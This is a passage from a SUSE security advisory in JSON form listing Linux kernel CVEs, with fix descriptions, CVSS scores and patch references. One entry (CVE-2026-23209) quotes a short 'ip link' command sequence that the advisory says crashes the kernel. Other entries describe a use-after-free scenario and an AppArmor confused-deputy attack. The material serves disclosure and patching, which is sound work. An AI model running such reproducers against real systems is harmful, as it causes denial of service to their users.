slab_post_alloc_hook mm/slub.c:4953 [inline]\n slab_alloc_node mm/slub.c:5263 [inline]\n kmem_cache_alloc_noprof+0x18d/0x6c0 mm/slub.c:5270\n dst_alloc+0x105/0x170 net/core/dst.c:89\n ip6_dst_alloc net/ipv6/route.c:342 [inline]\n icmp6_dst_alloc+0x75/0x460 net/ipv6/route.c:3333\n mld_sendpack+0x683/0xe60 net/ipv6/mcast.c:1844\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693\n process_one_work kernel/workqueue.c:3257 [inline]\n process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421\n kthread+0x711/0x8a0 kernel/kthread.c:463\n 
ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entr\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23004",
"url": "https://www.suse.com/security/cve/CVE-2026-23004"
},
{
"category": "external",
"summary": "SUSE Bug 1257231 for CVE-2026-23004",
"url": "https://bugzilla.suse.com/1257231"
},
{
"category": "external",
"summary": "SUSE Bug 1258655 for CVE-2026-23004",
"url": "https://bugzilla.suse.com/1258655"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2026-23004"
},
{
"cve": "CVE-2026-23054",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23054"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: hv_netvsc: reject RSS hash key programming without RX indirection table\n\nRSS configuration requires a valid RX indirection table. When the device\nreports a single receive queue, rndis_filter_device_add() does not\nallocate an indirection table; accepting RSS hash key updates in this\nstate leads to a hang.\n\nFix this by gating netvsc_set_rxfh() on ndc-\u003erx_table_sz and return\n-EOPNOTSUPP when the table is absent. This aligns set_rxfh with the device\ncapabilities and prevents incorrect behavior.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23054",
"url": "https://www.suse.com/security/cve/CVE-2026-23054"
},
{
"category": "external",
"summary": "SUSE Bug 1257732 for CVE-2026-23054",
"url": "https://bugzilla.suse.com/1257732"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2026-23054"
},
{
"cve": "CVE-2026-23060",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23060"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: authencesn - reject too-short AAD (assoclen\u003c8) to match ESP/ESN spec\n\nauthencesn assumes an ESP/ESN-formatted AAD. When assoclen is shorter than\nthe minimum expected length, crypto_authenc_esn_decrypt() can advance past\nthe end of the destination scatterlist and trigger a NULL pointer dereference\nin scatterwalk_map_and_copy(), leading to a kernel panic (DoS).\n\nAdd a minimum AAD length check to fail fast on invalid inputs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23060",
"url": "https://www.suse.com/security/cve/CVE-2026-23060"
},
{
"category": "external",
"summary": "SUSE Bug 1257735 for CVE-2026-23060",
"url": "https://bugzilla.suse.com/1257735"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2026-23060"
},
{
"cve": "CVE-2026-23074",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23074"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: Enforce that teql can only be used as root qdisc\n\nDesign intent of teql is that it is only supposed to be used as root qdisc.\nWe need to check for that constraint.\n\nAlthough not important, I will describe the scenario that unearthed this\nissue for the curious.\n\nGangMin Kim \u003ckm.kim1503@gmail.com\u003e managed to concoct a scenario as follows:\n\nROOT qdisc 1:0 (QFQ)\n \u251c\u2500\u2500 class 1:1 (weight=15, lmax=16384) netem with delay 6.4s\n \u2500\u2500 class 1:2 (weight=1, lmax=1514) teql\n\nGangMin sends a packet which is enqueued to 1:1 (netem).\nAny invocation of dequeue by QFQ from this class will not return a packet\nuntil after 6.4s. In the meantime, a second packet is sent and it lands on\n1:2. teql\u0027s enqueue will return success and this will activate class 1:2.\nMain issue is that teql only updates the parent visible qlen (sch-\u003eq.qlen)\nat dequeue. Since QFQ will only call dequeue if peek succeeds (and teql\u0027s\npeek always returns NULL), dequeue will never be called and thus the qlen\nwill remain as 0. With that in mind, when GangMin updates 1:2\u0027s lmax value,\nthe qfq_change_class calls qfq_deact_rm_from_agg. Since the child qdisc\u0027s\nqlen was not incremented, qfq fails to deactivate the class, but still\nfrees its pointers from the aggregate. So when the first packet is\nrescheduled after 6.4 seconds (netem\u0027s delay), a dangling pointer is\naccessed causing GangMin\u0027s causing a UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23074",
"url": "https://www.suse.com/security/cve/CVE-2026-23074"
},
{
"category": "external",
"summary": "SUSE Bug 1257749 for CVE-2026-23074",
"url": "https://bugzilla.suse.com/1257749"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2026-23074"
},
{
"cve": "CVE-2026-23089",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23089"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: usb-audio: Fix use-after-free in snd_usb_mixer_free()\n\nWhen snd_usb_create_mixer() fails, snd_usb_mixer_free() frees\nmixer-\u003eid_elems but the controls already added to the card still\nreference the freed memory. Later when snd_card_register() runs,\nthe OSS mixer layer calls their callbacks and hits a use-after-free read.\n\nCall trace:\n get_ctl_value+0x63f/0x820 sound/usb/mixer.c:411\n get_min_max_with_quirks.isra.0+0x240/0x1f40 sound/usb/mixer.c:1241\n mixer_ctl_feature_info+0x26b/0x490 sound/usb/mixer.c:1381\n snd_mixer_oss_build_test+0x174/0x3a0 sound/core/oss/mixer_oss.c:887\n ...\n snd_card_register+0x4ed/0x6d0 sound/core/init.c:923\n usb_audio_probe+0x5ef/0x2a90 sound/usb/card.c:1025\n\nFix by calling snd_ctl_remove() for all mixer controls before freeing\nid_elems. We save the next pointer first because snd_ctl_remove()\nfrees the current element.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23089",
"url": "https://www.suse.com/security/cve/CVE-2026-23089"
},
{
"category": "external",
"summary": "SUSE Bug 1257790 for CVE-2026-23089",
"url": "https://bugzilla.suse.com/1257790"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2026-23089"
},
{
"cve": "CVE-2026-23191",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23191"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: aloop: Fix racy access at PCM trigger\n\nThe PCM trigger callback of aloop driver tries to check the PCM state\nand stop the stream of the tied substream in the corresponding cable.\nSince both check and stop operations are performed outside the cable\nlock, this may result in UAF when a program attempts to trigger\nfrequently while opening/closing the tied stream, as spotted by\nfuzzers.\n\nFor addressing the UAF, this patch changes two things:\n- It covers the most of code in loopback_check_format() with\n cable-\u003elock spinlock, and add the proper NULL checks. This avoids\n already some racy accesses.\n- In addition, now we try to check the state of the capture PCM stream\n that may be stopped in this function, which was the major pain point\n leading to UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23191",
"url": "https://www.suse.com/security/cve/CVE-2026-23191"
},
{
"category": "external",
"summary": "SUSE Bug 1258395 for CVE-2026-23191",
"url": "https://bugzilla.suse.com/1258395"
},
{
"category": "external",
"summary": "SUSE Bug 1258396 for CVE-2026-23191",
"url": "https://bugzilla.suse.com/1258396"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2026-23191"
},
{
"cve": "CVE-2026-23204",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23204"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: cls_u32: use skb_header_pointer_careful()\n\nskb_header_pointer() does not fully validate negative @offset values.\n\nUse skb_header_pointer_careful() instead.\n\nGangMin Kim provided a report and a repro fooling u32_classify():\n\nBUG: KASAN: slab-out-of-bounds in u32_classify+0x1180/0x11b0\nnet/sched/cls_u32.c:221",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23204",
"url": "https://www.suse.com/security/cve/CVE-2026-23204"
},
{
"category": "external",
"summary": "SUSE Bug 1258340 for CVE-2026-23204",
"url": "https://bugzilla.suse.com/1258340"
},
{
"category": "external",
"summary": "SUSE Bug 1259126 for CVE-2026-23204",
"url": "https://bugzilla.suse.com/1259126"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2026-23204"
},
{
"cve": "CVE-2026-23209",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23209"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacvlan: fix error recovery in macvlan_common_newlink()\n\nvalis provided a nice repro to crash the kernel:\n\nip link add p1 type veth peer p2\nip link set address 00:00:00:00:00:20 dev p1\nip link set up dev p1\nip link set up dev p2\n\nip link add mv0 link p2 type macvlan mode source\nip link add invalid% link p2 type macvlan mode source macaddr add 00:00:00:00:00:20\n\nping -c1 -I p1 1.2.3.4\n\nHe also gave a very detailed analysis:\n\n\u003cquote valis\u003e\n\nThe issue is triggered when a new macvlan link is created with\nMACVLAN_MODE_SOURCE mode and MACVLAN_MACADDR_ADD (or\nMACVLAN_MACADDR_SET) parameter, lower device already has a macvlan\nport and register_netdevice() called from macvlan_common_newlink()\nfails (e.g. because of the invalid link name).\n\nIn this case macvlan_hash_add_source is called from\nmacvlan_change_sources() / macvlan_common_newlink():\n\nThis adds a reference to vlan to the port\u0027s vlan_source_hash using\nmacvlan_source_entry.\n\nvlan is a pointer to the priv data of the link that is being created.\n\nWhen register_netdevice() fails, the error is returned from\nmacvlan_newlink() to rtnl_newlink_create():\n\n if (ops-\u003enewlink)\n err = ops-\u003enewlink(dev, \u0026params, extack);\n else\n err = register_netdevice(dev);\n if (err \u003c 0) {\n free_netdev(dev);\n goto out;\n }\n\nand free_netdev() is called, causing a kvfree() on the struct\nnet_device that is still referenced in the source entry attached to\nthe lower device\u0027s macvlan port.\n\nNow all packets sent on the macvlan port with a matching source mac\naddress will trigger a use-after-free in macvlan_forward_source().\n\n\u003c/quote valis\u003e\n\nWith all that, my fix is to make sure we call macvlan_flush_sources()\nregardless of @create value whenever \"goto destroy_macvlan_port;\"\npath is taken.\n\nMany thanks to valis for following up on this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23209",
"url": "https://www.suse.com/security/cve/CVE-2026-23209"
},
{
"category": "external",
"summary": "SUSE Bug 1258518 for CVE-2026-23209",
"url": "https://bugzilla.suse.com/1258518"
},
{
"category": "external",
"summary": "SUSE Bug 1258784 for CVE-2026-23209",
"url": "https://bugzilla.suse.com/1258784"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2026-23209"
},
{
"cve": "CVE-2026-23268",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23268"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\napparmor: fix unprivileged local user can do privileged policy management\n\nAn unprivileged local user can load, replace, and remove profiles by\nopening the apparmorfs interfaces, via a confused deputy attack, by\npassing the opened fd to a privileged process, and getting the\nprivileged process to write to the interface.\n\nThis does require a privileged target that can be manipulated to do\nthe write for the unprivileged process, but once such access is\nachieved full policy management is possible and all the possible\nimplications that implies: removing confinement, DoS of system or\ntarget applications by denying all execution, by-passing the\nunprivileged user namespace restriction, to exploiting kernel bugs for\na local privilege escalation.\n\nThe policy management interface can not have its permissions simply\nchanged from 0666 to 0600 because non-root processes need to be able\nto load policy to different policy namespaces.\n\nInstead ensure the task writing the interface has privileges that\nare a subset of the task that opened the interface. This is already\ndone via policy for confined processes, but unconfined can delegate\naccess to the opened fd, by-passing the usual policy check.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23268",
"url": "https://www.suse.com/security/cve/CVE-2026-23268"
},
{
"category": "external",
"summary": "SUSE Bug 1258850 for CVE-2026-23268",
"url": "https://bugzilla.suse.com/1258850"
},
{
"category": "external",
"summary": "SUSE Bug 1259859 for CVE-2026-23268",
"url": "https://bugzilla.suse.com/1259859"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2026-23268"
},
{
"cve": "CVE-2026-23269",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23269"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\napparmor: validate DFA start states are in bounds in unpack_pdb\n\nStart states are read from untrusted data and used as indexes into the\nDFA state tables. The aa_dfa_next() function call in unpack_pdb() will\naccess dfa-\u003etables[YYTD_ID_BASE][start], and if the start state exceeds\nthe number of states in the DFA, this results in an out-of-bound read.\n\n==================================================================\n BUG: KASAN: slab-out-of-bounds in aa_dfa_next+0x2a1/0x360\n Read of size 4 at addr ffff88811956fb90 by task su/1097\n ...\n\nReject policies with out-of-bounds start states during unpacking\nto prevent the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23269",
"url": "https://www.suse.com/security/cve/CVE-2026-23269"
},
{
"category": "external",
"summary": "SUSE Bug 1259857 for CVE-2026-23269",
"url": "https://bugzilla.suse.com/1259857"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
